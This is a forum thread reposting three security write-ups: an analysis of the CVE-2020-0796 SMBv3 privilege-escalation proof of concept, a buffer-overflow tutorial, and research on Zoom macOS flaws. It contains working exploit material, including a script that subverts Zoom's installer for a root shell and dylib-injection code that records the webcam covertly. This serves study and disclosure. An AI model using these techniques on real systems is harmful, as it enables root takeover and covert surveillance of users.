Posts posted by Nytro

  1. CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis

    April 2, 2020
    Vulnerability Analysis · 404 Column · 404 English Paper

    Author: SungLin@Knownsec 404 Team
    Time: April 2, 2020
    Chinese version: https://paper.seebug.org/1164/

    0x00 Background

    On March 12, 2020, Microsoft confirmed that a critical vulnerability affecting the SMBv3 protocol exists in the latest version of Windows 10, and assigned it CVE-2020-0796. The flaw could allow an attacker to remotely execute code on an SMB server or client. On March 13, a PoC that causes a BSOD was announced, and on March 30, a PoC that achieves local privilege escalation was released. Here we analyze the local privilege escalation PoC.

    0x01 Exploit principle

    The vulnerability exists in the srv2.sys driver. Because SMB does not properly handle compressed data packets, the function Srv2DecompressData is called to process them without checking the legality of the compression header's OriginalCompressedSegmentSize and Offset fields, which results in the allocation of an undersized buffer. SmbCompressionDecompress then uses this smaller buffer for data processing, which can cause a copy overflow or out-of-bounds access. By running a local program, you can obtain the address of that program's token + 0x40 and send it to the SMB server inside the compressed data. That address then lands in the kernel memory that is written when the data is decompressed, and with a carefully constructed memory layout the token is modified in the kernel to elevate privileges.

    0x02 Get Token

    Let's analyze the code first. After the PoC program establishes a connection with SMB, it first obtains its own token by calling the function OpenProcessToken. The obtained token address is then sent to the SMB server inside the compressed data, to be modified in the kernel driver. The token address is the kernel address associated with the process's handle; TOKEN is a kernel memory structure used to describe the security context of a process, including its token privileges, login ID, session ID, token type, etc.


    The following is the token offset address obtained in my test.


    0x03 Compressed Data

    Next, the PoC calls RtlCompressBuffer to compress a piece of data and sends the compressed data to the SMB server, so that the SMB server will use this token address in the kernel. The data is 'A' * 0x1108 + (ktoken + 0x40).
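    The plaintext that gets compressed can be sketched as follows (a minimal Python sketch; the ktoken value is the one from the author's debug session, and the helper name is hypothetical):

```python
import struct

def build_plaintext(ktoken: int) -> bytes:
    """Data the PoC compresses: 0x1108 bytes of 'A' followed by the
    little-endian address of token + 0x40."""
    return b"A" * 0x1108 + struct.pack("<Q", ktoken + 0x40)

# token address observed in the debug session (illustrative)
plaintext = build_plaintext(0xFFFF9B893FDC46B0)
assert len(plaintext) == 0x1110
```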


    The length of the compressed data is 0x13. Stripping the header of the compressed data segment, the compressed data is followed by two identical values, 0x1FF2FF00BC; these two values are the key to privilege elevation.


    0x04 Debugging

    Let's start debugging; this is an integer overflow vulnerability. In srv2!Srv2DecompressData, the 32-bit addition 0xffffffff + 0x10 wraps around to 0xf, so a far smaller buffer than intended is allocated in srvnet!SrvNetAllocateBuffer.


    Execution then enters srvnet!SmbCompressionDecompress and nt!RtlDecompressBufferEx2 to continue decompression, then the function nt!PoSetHiberRange, and then the decompression operation begins. Adding OriginalCompressedSegmentSize = 0xffffffff to the address of the undersized UncompressBuffer allocated via the integer overflow yields an end address far beyond the buffer's limit, which can cause a copy overflow.


    But the size of the data we ultimately need to copy is 0x1108, so there is still no overflow, because the actual allocated size is 0x1278. The pool allocation goes through srvnet!SrvNetAllocateBuffer, which finally enters srvnet!SrvNetAllocateBufferFromPool and calls nt!ExAllocatePoolWithTag to allocate pool memory.


    Although the copy does not overflow the allocation, it does overwrite other variables in this memory block, including the return value of srv2!Srv2DecompressData. The UncompressBuffer address is stored at the fixed offset 0x60, and the return value at the fixed offset 0x1150, which means the return value lies at offset 0x10f0 relative to the stored UncompressBuffer address; the address that stores the offset data is at 0x1168, which is offset 0x1108 relative to the stored decompressed-data address.


    Why are these values fixed? Because OriginalCompressedSegmentSize = 0xffffffff and Offset = 0x10 are passed in, and the 32-bit addition wraps around to 0xf. In srvnet!SrvNetAllocateBuffer the passed-in size 0xf is checked: when it is less than 0x1100, a fixed value of 0x1100 is used as the allocation size for the subsequent structure space; when it is greater than 0x1100, the passed-in size is used.
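    A sketch of the arithmetic, assuming (per public analyses of the patch) that Srv2DecompressData computes the allocation size as OriginalCompressedSegmentSize + Offset in 32-bit arithmetic, and that SrvNetAllocateBuffer substitutes a 0x1100-byte minimum:

```python
MASK32 = 0xFFFFFFFF

def alloc_size(original_size: int, offset: int) -> int:
    requested = (original_size + offset) & MASK32  # 32-bit wrap-around
    # SrvNetAllocateBuffer uses a fixed 0x1100 for any smaller request
    return requested if requested > 0x1100 else 0x1100

assert (0xFFFFFFFF + 0x10) & MASK32 == 0xF     # the integer overflow
assert alloc_size(0xFFFFFFFF, 0x10) == 0x1100  # fixed-size chunk is allocated
```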


    Now back to the decompressed data. The size of the compressed data is 0x13, and decompression proceeds normally, copying 0x1108 bytes of 'A'; the 8-byte address of token + 0x40 is copied right after the 'A's.


    After decompression copies the decompressed data to the initially allocated address, the decompression function exits normally, and memcpy is then called for the next data copy. The key point is that rcx has now become the address of token + 0x40 of the local program!!!


    After decompression, the memory layout is 0x1100 bytes of 'A' followed by the token address at offset 0x1108. The function srvnet!SrvNetAllocateBuffer returned the memory address we need; v8 sits at the initial memory offset 0x10f0, so v8 + 0x18 = 0x1108. The size of the copy is controllable, and the offset passed in is 0x10. Finally, memcpy copies the compressed data 0x1FF2FF00BC from the source address to the destination address 0xffff9b893fdc46f0 (token + 0x40); the last 16 bytes are overwritten, and the value of the token is successfully modified.


    0x05 Elevation

    The overwriting values are two identical copies of 0x1FF2FF00BC. Why use two identical values to overwrite the data at token + 0x40? This is one of the methods of manipulating the token in the Windows kernel to elevate privileges; generally, there are two methods.


    The first method is to directly overwrite the Token. The second method is to modify the Token. Here, the Token is modified.

    In WinDbg, you can run the dt _TOKEN command at the kd> prompt to view its structure.


    So we modify the value of _SEP_TOKEN_PRIVILEGES, which enables and disables privileges, changing its Present and Enabled fields to 0x1FF2FF00BC, the full privilege set of a SYSTEM process token.
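    The resulting 16-byte overwrite at token + 0x40 (Present at +0x40, Enabled at +0x48 within _SEP_TOKEN_PRIVILEGES) can be sketched as:

```python
import struct

# privilege mask of a SYSTEM token, per the analysis above
SYSTEM_PRIVILEGES = 0x1FF2FF00BC

# two identical 8-byte values: Present, then Enabled
overwrite = struct.pack("<QQ", SYSTEM_PRIVILEGES, SYSTEM_PRIVILEGES)
assert len(overwrite) == 16
```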

    This successfully elevates privileges in the kernel; arbitrary code can then be executed by injecting regular shellcode into the Windows process winlogon.exe.

    The shellcode then launches the calculator.

    Reference link:

    1. https://github.com/eerykitty/CVE-2020-0796-PoC

    2. https://github.com/danigargu/CVE-2020-0796

    3. https://ired.team/miscellaneous-reversing-forensics/windows-kernel/how-kernel-exploits-abuse-tokens-for-privilege-escalation


    This article was published by Seebug Paper. Please indicate the source when reposting: https://paper.seebug.org/1165/

     

    Source: https://paper.seebug.org/1165/

  2. Binary Exploitation 01 — Introduction

    Mar 31 · 4 min read
     
     

    GREETINGS FELLOW HACKERS!
    It’s been a while since our last post, but that’s because we’ve prepared something for you: a multi-episode Binary Exploitation series. Without further ado, let’s get started.


    What is Memory Corruption?
    It might sound familiar, but what does it really mean?
    Memory corruption is a vast area which we will explore throughout this series, but for now it is important to remember that it refers to “modifying a binary’s memory in a way that was not intended”. Basically, any kind of system-level exploit involves some form of memory corruption.


    Let’s have a look at an example:

    (screenshot: the source code of the example program)

    Consider the program above: a short program that asks for user input. If the input matches the Admin’s secret password, we are granted Admin privileges; otherwise we remain a normal user.
    How can we become Admin without knowing the password?
    One solution is to brute-force the password. That might work for a short password, but for a 32-byte password it’s useless. So what can we do? Let’s play with random input values:


    “Welcome Admin”, what just happened? Let’s take a closer look at the memory level, using a debugger, and understand why we became Admin.


    We can see that the INPUT we enter will be loaded on the stack (“A stack is an area of memory for storing data temporarily”) at RBP-0x30 and the AUTH variable is located on the stack at RBP-0x4.

    Another aspect we can observe is that the “gets” function has no limit for the number of characters it reads.

    Thus, we can enter more than 32 characters. This leads to a so-called buffer overflow.


    As we can see, our input (‘A’*32 + ‘a’*16) overflows the user_input buffer and overwrites the auth variable, thus giving us Admin privileges.
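    The offsets explain why this input works; a sketch of the arithmetic (constant names are illustrative):

```python
BUF_OFFSET = 0x30   # user_input sits at rbp-0x30
AUTH_OFFSET = 0x04  # auth sits at rbp-0x4

gap = BUF_OFFSET - AUTH_OFFSET   # bytes from buffer start to auth
payload = b"A" * 32 + b"a" * 16  # 48 bytes of input

assert gap == 44                 # only 44 bytes separate them...
assert len(payload) > gap        # ...so auth is overwritten with 'a's
```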

    Think this is cool? Just wait, there’s even more.


    We have seen that by performing buffer overflows we can overwrite variables on the stack. But is that all we can really do? Let’s have a quick look into how functions work.


    Whenever a function is called, we can see that a value is pushed to the stack. That value is what we call a “return address”. After the function finishes executing, it can return to the function that called it using the “return address”.
    So if the return address is placed on the stack and we can perform a buffer overflow, can we overwrite it? Let’s try.

    (screenshot: running the program with a big input)

    As we can see, the program returned a “Segmentation fault” because, when the main function finished executing, it tried to use the “return address”, but the return address had been overwritten with A’s by our input.

    So what does this mean? It means we can take over the execution flow by overwriting the “return address” with the address of another function. Let’s try to redirect the execution of the program to the takeover_the_world() function.
    The function is located at address 0x00000000004005c7 (one way to find this is using the command: objdump -d program_name).

    Putting things together we get the following input (payload):
    ‘A’*32 + ‘a’*16 + ‘\xc7\x05\x40\x00\x00\x00\x00\x00’
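    The 8-byte trailer is just the little-endian encoding of the function’s address; a sketch:

```python
import struct

RET_ADDR = 0x00000000004005C7  # address of takeover_the_world()

# padding to reach the saved return address, then the new return address
payload = b"A" * 32 + b"a" * 16 + struct.pack("<Q", RET_ADDR)
assert payload.endswith(b"\xc7\x05\x40\x00\x00\x00\x00\x00")
```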


    And we got a shell. Hurray!


    Concluding this first part, I hope I have sparked your curiosity and interest in this wonderful topic. Buffer overflows are one of the many ways memory corruption can be achieved. In the upcoming episodes we will explore more techniques and strategies.

    Until next time!

    Source: https://medium.com/cyber-dacians/binary-exploitation-01-introduction-9fcd2cdce9c6


  3.  
    The 'S' in Zoom, Stands for Security
    uncovering (local) security flaws in Zoom's latest macOS client
    by: Patrick Wardle / March 30, 2020
     
    📝 Update:

    Zoom has patched both bugs in Version 4.6.9 (19273.0402).

    For more details see:

    New Updates for macOS

    Background

    Given the current worldwide pandemic and government-sanctioned lock-downs, working from home has become the norm …for now. Thanks to this, Zoom, “the leader in modern enterprise video communications”, is well on its way to becoming a household verb, and as a result, its stock price has soared! 📈

    However if you value either your (cyber) security or privacy, you may want to think twice about using (the macOS version of) the app.

    In this blog post, we’ll start by briefly looking at recent security and privacy flaws that affected Zoom. Following this, we’ll transition into discussing several new security issues that affect the latest version of Zoom’s macOS client.

    📝 Though the new issues we'll discuss today remain unpatched, they are both local security issues.

    As such, to be successfully exploited, they require that malware or an attacker already have a foothold on a macOS system.

    Though Zoom is incredibly popular it has a rather dismal security and privacy track record.

    In June 2019, the security researcher Jonathan Leitschuh discovered a trivially exploitable remote 0day vulnerability in the Zoom client for Mac, which “allow[ed] any malicious website to enable your camera without your permission😱


    This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission.

    Additionally, if you’ve ever installed the Zoom client and then uninstalled it, you still have a localhost web server on your machine that will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage. This re-install ‘feature’ continues to work to this day.” -Jonathan Leitschuh

     
    📝 Interested in more details? Read Jonathan's excellent writeup:
     
    "Zoom Zero Day: 4+ Million Webcams & maybe an RCE?".

    Rather hilariously, Apple (forcibly!) removed the vulnerable Zoom component from users’ Macs worldwide via macOS’s Malware Removal Tool (MRT).

     

    AFAIK, this is the only time Apple has taken such draconian action.

     

    More recently, Zoom suffered a rather embarrassing privacy faux pas when it was uncovered that its iOS application was “send[ing] data to Facebook even if you don’t have a Facebook account” …yikes!

    📝 Interested in more details? Read Motherboard's writeup:
     
    "Zoom iOS App Sends Data to Facebook Even if You Don't Have a Facebook Account".

    Although Zoom was quick to patch the issue (by removing the (ir)responsible code), many security researchers were quick to point out that said code should never have made it into the application in the first place.

     

    And finally today, noted macOS security researcher Felix Seele (and #OBTS v2.0 speaker!) noted that Zoom’s macOS installer (rather shadily) performs its “[install] job without you ever clicking install”:

     
     
    "This is not strictly malicious but very shady and definitely leaves a bitter aftertaste. The application is installed without the user giving his final consent and a highly misleading prompt is used to gain root privileges. The same tricks that are being used by macOS malware." -Felix Seele
    📝 For more details on this, see Felix's comprehensive blog post:
     
    "Good Apps Behaving Badly: Dissecting Zoom’s macOS installer workaround"

    The (preinstall) scripts mentioned by Felix can be easily viewed (and extracted) from Zoom’s installer package via the Suspicious Package application.

    Local Zoom Security Flaw #1: Privilege Escalation to Root

    Zoom’s security and privacy track record leaves much to be desired.

    As such, today when Felix Seele also noted that the Zoom installer may invoke the AuthorizationExecuteWithPrivileges API to perform various privileged installation tasks, I decided to take a closer look. Almost immediately I uncovered several issues, including a vulnerability that leads to a trivial and reliable local privilege escalation (to root!).

     

    Stop me if you’ve heard me talk (rant) about this before, but Apple clearly notes that the AuthorizationExecuteWithPrivileges API is deprecated and should not be used. Why? Because the API does not validate the binary that will be executed (as root!) …meaning a local unprivileged attacker or piece of malware may be able to surreptitiously tamper with or replace that item in order to escalate their privileges to root (as well).


    At DefCon 25, I presented a talk titled “Death By 1000 Installers” that covers this in great detail.

    …moreover in my blog post “Sniffing Authentication References on macOS” from just last week, we covered this in great detail as well!

    Finally, this insecure API was (also) discussed in detail at “Objective by the Sea” v3.0, in a talk (by Julia Vashchenko) titled “Job(s) Bless Us! Privileged Operations on macOS”.

    Now it should be noted that if the AuthorizationExecuteWithPrivileges API is invoked with a path to a (SIP) protected or read-only binary (or script), this issue would be thwarted (as in such a case, unprivileged code or an attacker may not be able to subvert the binary/script).

    So the question here, in regards to Zoom, is: “How are they utilizing this inherently insecure API?” Because if they are invoking it insecurely, we may have a lovely privilege escalation vulnerability!

    As discussed in my DefCon presentation, the easiest way to answer this question is simply to run a process monitor, execute the installer package (or whatever invokes the AuthorizationExecuteWithPrivileges API), and observe the arguments that are passed to security_authtrampoline (the setuid system binary that ultimately performs the privileged action):

    (figure: flow of control through security_authtrampoline)

    The image above illustrates the flow of control initiated by the AuthorizationExecuteWithPrivileges API and shows how the item (binary, script, command, etc.) that is to be executed with root privileges is passed as the first parameter to the security_authtrampoline process. If this item is editable (i.e. can be maliciously subverted) by an unprivileged attacker, then that’s a clear security issue!

    Let’s figure out what Zoom is executing via AuthorizationExecuteWithPrivileges!

    First, we download the latest version of Zoom’s installer for macOS (Version 4.6.8 (19178.0323)) from https://zoom.us/download.

    Then, we fire up our macOS Process Monitor (https://objective-see.com/products/utilities.html#ProcessMonitor), and launch the Zoom installer package (Zoom.pkg).

    If the user installing Zoom is running as a ‘standard’ (read: non-admin) user, the installer may prompt for administrator credentials.

    …as expected our process monitor will observe the launching (ES_EVENT_TYPE_NOTIFY_EXEC) of /usr/libexec/security_authtrampoline to handle the authorization request:

    # ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "uid" : 0,
        "arguments" : [
          "/usr/libexec/security_authtrampoline",
          "./runwithroot",
          "auth 3",
          "/Users/tester/Applications/zoom.us.app",
          "/Applications/zoom.us.app"
        ],
        "ppid" : 1876,
        "ancestors" : [
          1876,
          1823,
          1820,
          1
        ],
        "signing info" : {
          "csFlags" : 603996161,
          "signatureIdentifier" : "com.apple.security_authtrampoline",
          "cdHash" : "DC98AF22E29CEC96BB89451933097EAF9E01242",
          "isPlatformBinary" : 1
        },
        "path" : "/usr/libexec/security_authtrampoline",
        "pid" : 1882
      },
      "timestamp" : "2020-03-31 03:18:45 +0000"
    }
    

    And what is Zoom attempting to execute as root (i.e. what is passed to security_authtrampoline)?

    …a bash script named runwithroot.

    If the user provides the requested credentials to complete the install, the runwithroot script will be executed as root (note the uid of 0):

    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "uid" : 0,
        "arguments" : [
          "/bin/sh",
          "./runwithroot",
          "/Users/tester/Applications/zoom.us.app",
          "/Applications/zoom.us.app"
        ],
        "ppid" : 1876,
        "ancestors" : [
          1876,
          1823,
          1820,
          1
        ],
        "signing info" : {
          "csFlags" : 603996161,
          "signatureIdentifier" : "com.apple.sh",
          "cdHash" : "D3308664AA7E12DF271DC78A7AE61F27ADA63BD6",
          "isPlatformBinary" : 1
        },
        "path" : "/bin/sh",
        "pid" : 1882
      },
      "timestamp" : "2020-03-31 03:18:45 +0000"
    }
    

    The contents of runwithroot are irrelevant. All that matters is: can a local, unprivileged attacker (or piece of malware) subvert the script prior to its execution as root? (Again, recall that the AuthorizationExecuteWithPrivileges API does not validate what is being executed.)

    Since it’s Zoom we’re talking about, the answer is of course yes! 😅

    We can confirm this by noting that during the installation process, the macOS Installer (which handles installations of .pkgs) copies the runwithroot script to a user-writable temporary directory:

    tester@users-Mac T % pwd      
    /private/var/folders/v5/s530008n11dbm2n2pgzxkk700000gp/T
    tester@users-Mac T % ls -lart com.apple.install.v43Mcm4r
    total 27224
    -rwxr-xr-x   1 tester  staff     70896 Mar 23 02:25 zoomAutenticationTool
    -rw-r--r--   1 tester  staff       513 Mar 23 02:25 zoom.entitlements
    -rw-r--r--   1 tester  staff  12008512 Mar 23 02:25 zm.7z
    -rwxr-xr-x   1 tester  staff       448 Mar 23 02:25 runwithroot
    ...
    

     

    Lovely - it looks like we’re in business and may be able to gain root privileges!

    Exploitation of these types of bugs is trivial and reliable (though it requires some patience …as you have to wait for the installer or updater to run!).

    To exploit Zoom, a local non-privileged attacker can simply replace or subvert the runwithroot script during an install (or upgrade?) to gain root access.
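    A minimal sketch of such an attacker (assuming only that the staged script is user-writable; the payload and directory layout mirror the listing above):

```python
import glob
import os

PAYLOAD = (
    "cp /bin/ksh /tmp\n"
    "chown root:wheel /tmp/ksh\n"
    "chmod u+s /tmp/ksh\n"
)

def subvert(tmp_root: str) -> bool:
    """Find a staged runwithroot under the installer's temp
    directory and prepend our commands, so they run as root."""
    pattern = os.path.join(tmp_root, "com.apple.install.*", "runwithroot")
    for script in glob.glob(pattern):
        with open(script, "r+") as f:
            original = f.read()
            f.seek(0)
            f.write("#!/bin/sh\n" + PAYLOAD + original)
        return True
    return False

# an attacker would poll the user's temp dir until the installer runs, e.g.:
# while not subvert(os.environ["TMPDIR"]): pass
```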

    For example to pop a root shell, simply add the following commands to the runwithroot script:

    cp /bin/ksh /tmp
    chown root:wheel /tmp/ksh
    chmod u+s /tmp/ksh
    open /tmp/ksh

    Le boom 💥: a root shell!

    Local Zoom Security Flaw #2: Code Injection for Mic & Camera Access

    In order for Zoom to be useful it requires access to the system’s mic and camera.

    On recent versions of macOS, this requires explicit user approval (which, from a security and privacy point of view, is a good thing).

    Unfortunately, Zoom has (for reasons unbeknownst to me) a specific “exclusion” that allows malicious code to be injected into its process space, where said code can piggy-back off Zoom’s (mic and camera) access! This gives malicious code a way to either record Zoom meetings, or worse, access the mic and camera at arbitrary times (without the user-approval prompt)!

    Modern macOS applications are compiled with a feature called the “Hardened Runtime”. This security enhancement is well documented by Apple, who note:

    "The Hardened Runtime, along with System Integrity Protection (SIP), protects the runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering." -Apple

    I’d like to think that Apple attended my 2016 talk at ZeroNights in Moscow, where I noted this feature would be a great addition to macOS.

    We can check that Zoom (or any application) is validly signed and compiled with the “Hardened Runtime” via the codesign utility:

    $ codesign -dvvv /Applications/zoom.us.app/
    Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
    Identifier=us.zoom.xos
    Format=app bundle with Mach-O thin (x86_64)
    CodeDirectory v=20500 size=663 flags=0x10000(runtime) hashes=12+5 location=embedded
    
    ...
    Authority=Developer ID Application: Zoom Video Communications, Inc. (BJ4HAAB9B3)
    Authority=Developer ID Certification Authority
    Authority=Apple Root CA
    
    

    A flags value of 0x10000(runtime) indicates that the application was compiled with the “Hardened Runtime” option, and thus said runtime, should be enforced by macOS for this application.

    Ok so far so good! Code injection attacks should be generically thwarted due to this!

    …but (again) this is Zoom, so not so fast 😅

    Let’s dump Zoom’s entitlements (entitlements are code-signed capabilities and/or exceptions), again via the codesign utility:

    codesign -d --entitlements :- /Applications/zoom.us.app/
    Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN...>
    <plist version="1.0">
    <dict>
      <key>com.apple.security.automation.apple-events</key>
      <true/>
      <key>com.apple.security.device.audio-input</key>
      <true/>
      <key>com.apple.security.device.camera</key>
      <true/>
      <key>com.apple.security.cs.disable-library-validation</key>
      <true/>
      <key>com.apple.security.cs.disable-executable-page-protection</key>
      <true/>
    </dict>
    </plist>
    

    The com.apple.security.device.audio-input and com.apple.security.device.camera entitlements are required as Zoom needs (user-approved) mic and camera access.

    However the com.apple.security.cs.disable-library-validation entitlement is interesting. In short it tells macOS, “hey, yah I still (kinda?) want the “Hardened Runtime”, but please allow any libraries to be loaded into my address space” …in other words, library injections are a go!

    Apple documents this entitlement as well.

    So, thanks to this entitlement we can (in theory) circumvent the “Hardened Runtime” and inject a malicious library into Zoom (for example to access the mic and camera without an access alert).
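    The entitlements dump above can also be inspected programmatically; a minimal sketch that parses (an inlined excerpt of) codesign's XML output with Python's plistlib:

```python
import plistlib

# excerpt of: codesign -d --entitlements :- /Applications/zoom.us.app/
ENTITLEMENTS_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>com.apple.security.device.camera</key><true/>
  <key>com.apple.security.cs.disable-library-validation</key><true/>
</dict>
</plist>"""

entitlements = plistlib.loads(ENTITLEMENTS_XML)

# library validation disabled: unsigned dylibs may be loaded
assert entitlements["com.apple.security.cs.disable-library-validation"] is True
```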

    There are a variety of ways to coerce a target process to load a dynamic library, either at load time or at runtime. Here we’ll focus on a method I call “dylib proxying”, as it’s both stealthy and persistent (malware authors, take note!).

    In short, we replace a legitimate library that the target (i.e. Zoom) depends on with our own, then proxy all requests made by Zoom back to the original library to ensure legitimate functionality is maintained. Both the app and the user remain none the wiser!

    📝 Another benefit of the "dylib proxying" is that it does not compromise the code signing certificate of the binary (however, it may affect the signature of the application bundle).

    A benefit of this, is that Apple's runtime signature checks (e.g. for mic & camera access) do not seem to detect the malicious library, and thus still afford the process continued access to the mic & camera.

    This is a method I’ve often (ab)used before in a handful of exploits, for example to (previously) bypass SIP:

    (figure: proxying a library to inject code into Apple's installer)

    As the image illustrates, one could proxy the IASUtilities library so that malicious code would be automatically loaded (‘injected’) by the macOS dynamic linker (dyld) into Apple’s installer (a prerequisite for the SIP bypass exploit).

    Here, we’ll similarly proxy a library (required by Zoom), such that our malicious library will be automatically loaded into Zoom’s trusted process address space any time it’s launched.

    To determine what libraries Zoom is linked against (read: requires), and which will thus be automatically loaded by the macOS dynamic loader, we can use otool with the -L flag:

    $ otool -L /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    /Applications/zoom.us.app/Contents/MacOS/zoom.us:
      @rpath/curl64.framework/Versions/A/curl64
      /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
      /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
      /usr/lib/libobjc.A.dylib
      /usr/lib/libc++.1.dylib
      /usr/lib/libSystem.B.dylib
      /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
      /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
      /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
    

     

    📝 Due to macOS's System Integrity Protection (SIP), we cannot replace any system libraries.

    As such, for an application to be ‘vulnerable’ to “dylib proxying” it must load a library from either its own application bundle, or another non-SIP’d location (and must not be compiled with the “hardened runtime” (well unless it has the com.apple.security.cs.disable-library-validation entitlement exception)).

    Looking at the Zoom’s library dependencies, we see: @rpath/curl64.framework/Versions/A/curl64. We can resolve the runpath (@rpath) again via otool, this time with the -l flag:

    $ otool -l /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    ...
    
    Load command 22
              cmd LC_RPATH
          cmdsize 48
             path @executable_path/../Frameworks (offset 12)
    
    

    The @executable_path will be resolved at runtime to the binary’s path, thus the dylib will be loaded out of: /Applications/zoom.us.app/Contents/MacOS/../Frameworks, or more specifically /Applications/zoom.us.app/Contents/Frameworks.
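    The resolution described above can be sketched with simple path arithmetic (purely illustrative):

```python
import os

executable = "/Applications/zoom.us.app/Contents/MacOS/zoom.us"
rpath = "@executable_path/../Frameworks"             # from LC_RPATH
dylib = "@rpath/curl64.framework/Versions/A/curl64"  # from otool -L

# dyld substitutes the executable's directory, then normalizes the path
resolved_rpath = os.path.normpath(
    rpath.replace("@executable_path", os.path.dirname(executable)))
resolved_dylib = os.path.join(resolved_rpath, dylib[len("@rpath/"):])

assert resolved_rpath == "/Applications/zoom.us.app/Contents/Frameworks"
```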

    Taking a peek at Zoom’s application bundle, we can confirm the presence of curl64 (and many other frameworks and libraries) that will all be loaded whenever Zoom is launched.
    📝 For details on "runpaths" (@rpath) and executable paths (@executable_path) as well as more information on creating a proxy dylib, check out my paper:
     
    "Dylib Hijacking on OS X"

    For simplicity’s sake, we’ll target Zoom’s libssl.1.0.0.dylib (as it’s a stand-alone library, versus a framework/bundle) as the library we’ll proxy.

    Step #1 is to rename the legitimate library. For example here, we simply prefix it with an underscore: _libssl.1.0.0.dylib

    Now, if we run Zoom, it will (as expected) crash, as a library it requires (libssl.1.0.0.dylib) is ‘missing’:

    patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    dyld: Library not loaded: @rpath/libssl.1.0.0.dylib
    Referenced from: /Applications/zoom.us.app/Contents/Frameworks/curl64.framework/Versions/A/curl64
    Reason: image not found
    Abort trap: 6
    

    This is actually good news, as it means if we place any library named libssl.1.0.0.dylib in Zoom’s Frameworks directory dyld will (blindly) attempt to load it.

    Step #2, let’s create a simple library, with a custom constructor (that will be automatically invoked when the library is loaded):

    #import <Foundation/Foundation.h>
    #include <libproc.h>
    #include <unistd.h>

    //automatically invoked by dyld when the library is loaded
    __attribute__((constructor))
    static void constructor(void)
    {
        //get the path of the (host) process we've been loaded into
        char path[PROC_PIDPATHINFO_MAXSIZE] = {0};
        proc_pidpath(getpid(), path, sizeof(path)-1);

        NSLog(@"zoom zoom: loaded in %d: %s", getpid(), path);

        return;
    }

    …and save it to /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib.

    Then we re-run Zoom:

    patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    zoom zoom: loaded in 39803: /Applications/zoom.us.app/Contents/MacOS/zoom.us
    

    Hooray! Our library is loaded by Zoom.

    Unfortunately Zoom then exits right away. This is also not unexpected as our libssl.1.0.0.dylib is not an ssl library…that is to say, it doesn’t export any required functionality (i.e. ssl capabilities!). So Zoom (gracefully) fails.

    Not to worry, this is where the beauty of “dylib proxying” shines.

    Step #3, via simple linker directives, we can tell Zoom, “hey, while our library doesn’t implement the required (ssl) functionality you’re looking for, we know who does!” and then point Zoom to the original (legitimate) ssl library (that we renamed _libssl.1.0.0.dylib).

    Diagrammatically this looks like so: reexport.png

    To create the required linker directive, we add the -XLinker -reexport_library and then the path to the proxy library target, under “Other Linker Flags” in Xcode:

    linkerFlags.png

    To complete the creation of the proxy library, we must also update the embedded reexport path (within our proxy dylib) so that it points to the (original, albeit renamed) ssl library. Luckily Apple provides the install_name_tool tool just for this purpose:

    patrick$ install_name_tool -change @rpath/libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib  /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib 
    

    We can now confirm (via otool) that our proxy library references the original ssl library. Specifically, we note that our proxy dylib (libssl.1.0.0.dylib) contains a LC_REEXPORT_DYLIB that points to the original ssl library (_libssl.1.0.0.dylib):

    patrick$ otool -l /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib 
    
    ...
    Load command 11
              cmd LC_REEXPORT_DYLIB
          cmdsize 96
             name /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib
       time stamp 2 Wed Dec 31 14:00:02 1969
          current version 1.0.0
    compatibility version 1.0.0
    
    

    Re-running Zoom confirms that our proxy library (and the original ssl library) are both loaded, and that Zoom perfectly functions as expected! 🔥

    injected.png

    The appeal of injecting a library into Zoom revolves around its (user-granted) access to the mic and camera. Once our malicious library is loaded into Zoom’s process/address space, the library will automatically inherit any/all of Zoom’s access rights/permissions!

    This means that if the user has given Zoom access to the mic and camera (a more than likely scenario), our injected library can equally access those devices.

    📝 If Zoom has not been granted access to the mic or the camera, our library should be able to programmatically detect this (to silently 'fail').

    …or we can go ahead and still attempt to access the devices, as the access prompt will originate “legitimately” from Zoom and thus likely to be approved by the unsuspecting user.

    To test this “access inheritance” I added some code to the injected library to record a few seconds of video off the webcam:

    //grab the default video capture device (i.e. the webcam)
    AVCaptureDevice* device = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo];

    self.session = [[AVCaptureSession alloc] init];

    //wrap the camera in a capture input
    AVCaptureDeviceInput* input = [AVCaptureDeviceInput deviceInputWithDevice:device
                                   error:nil];

    //output object that writes the captured frames to a movie file
    self.movieFileOutput = [[AVCaptureMovieFileOutput alloc] init];

    [self.session addInput:input];
    [self.session addOutput:self.movieFileOutput];

    [self.session startRunning];

    [self.movieFileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"zoom.mov"]
                          recordingDelegate:self];

    //stop recording after 5 seconds
    [NSTimer scheduledTimerWithTimeInterval:5 target:self
             selector:@selector(finishRecord:) userInfo:nil repeats:NO];

    ...

    Normally this code would trigger an alert from macOS, asking the user to confirm access to the mic and camera. However, as we’re injected into Zoom (which was already given access by the user), no additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video.

    Interestingly, the test captured the real brains behind this research:

    pup.png
